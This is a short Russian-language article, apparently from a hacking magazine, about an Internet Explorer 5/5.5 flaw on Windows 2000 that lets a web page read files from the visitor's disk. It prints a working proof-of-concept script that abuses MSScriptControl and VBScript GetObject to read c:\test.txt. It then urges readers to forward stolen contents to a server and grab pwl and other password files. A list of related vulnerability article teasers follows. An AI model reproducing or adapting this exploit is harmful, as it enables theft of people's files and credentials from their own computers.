Снова возвращаемся к
любимой всеми теме – тасканию файлов через
web. Дырка присуща различным IE на Win2K, по
крайней мере опробовано лично на пятой
версии, говорят, так же работает и на 5.5. С
помощью бага можно стащить любой файл с
компьютера пользователя. Вот например
данный скрипт тащит с компа пользователя
файл test.txt.

<html>
<h2>
Written by Georgi Guninski.
<br>
Reads c:\test.txt
<br>
</h2>
<script>
alert("This script reads C:\\TEST.TXT\nYou may need to create it\n")
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObject("c:/test.txt","htmlfile")');
setTimeout("alert(x.body.outerHTML);",2000);
</script>
</html>

Как видите, ошибка
состоит в неправильной обработке MSScriptControl.ScriptControl, легко перенаправить
полученный текст в другой объект, например
в скрипт поста в базу данных, откуда и
получить его в готовом виде. Таким образом
можно например, зная фамилию пользователя,
стащить у него pwl-файл, утащить временные
файлы с паролями и т.д. В общем, простор для
разгула вполне есть – дерзайте.

З.Ы.: Дырка обнаружена
Георгием Гунинским, все вопросы к нему.

  • Выполнение произвольных команд в IE

    В списке истории посещенных URL остаются страницы, содержащие в заголовке javascript код. …
    16.04.2002
    9 мин на чтение

  • Проблемы с GetObject() в IE 5.5-6.0

    Недостаток, существующий в Microsoft Internet Explorer, позволяет удаленному нападающему п…
    08.01.2002
    4 мин на чтение

  • Большая дырка в SSH

    Если поле, содержащее зашифрованный пароль (в /etc/shadow, /etc/password, и т.
    23.07.2001
    3 мин на чтение

  • SSI как оружие

    SSI - это Server Side Includes, используется оно в файлах .shtml и .shtm, а также при опре…
    23.07.2001
    10 мин на чтение

  • Определение файлов через IE

    Уязвимость в Microsoft Internet Explorer позволяет злонамеренному web-мастеру раскрывать ч…
    08.01.2002
    3 мин на чтение

  • Доступ к локальным файлам через IE

    Уязвимость в IE позволяет читать и посылать местные файлы. Проблема связанна с возможность…
    08.01.2002
    5 мин на чтение

  • Дырка в IE: исполняет ActiveScript

    При помощи XML и XSL можно выполнить Active Script, даже если их исполнение отключено. Уяз…
    23.04.2001
    7 мин на чтение

  • DoS для IE 5.5

    Internet Explorer легко, оказывается, можно обрушить, используя Word–овский объект (объект…
    25.04.2001
    4 мин на чтение

  • Дырки в GuildFTPd

    GuildFTPd – небольшой ftp-сервер. Имеется пара дырок:
    01.06.2001
    3 мин на чтение

  • АПОРТ взломан!

    Сегодня примерно в 12:30 была произведена атака на широко известный портал www.aport.ru (с…
    11.05.2001
    4 мин на чтение

  • Дырка в WebXQ-сервере

    WebXQ v2.1.204 – web-сервер, который раздают на сайте http://www.datawizard.net. Как обычн…
    27.04.2001
    3 мин на чтение

  • Файл через web #1

    Прива, люди идущие по Х дороге. %)
    13.06.2001
    4 мин на чтение

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии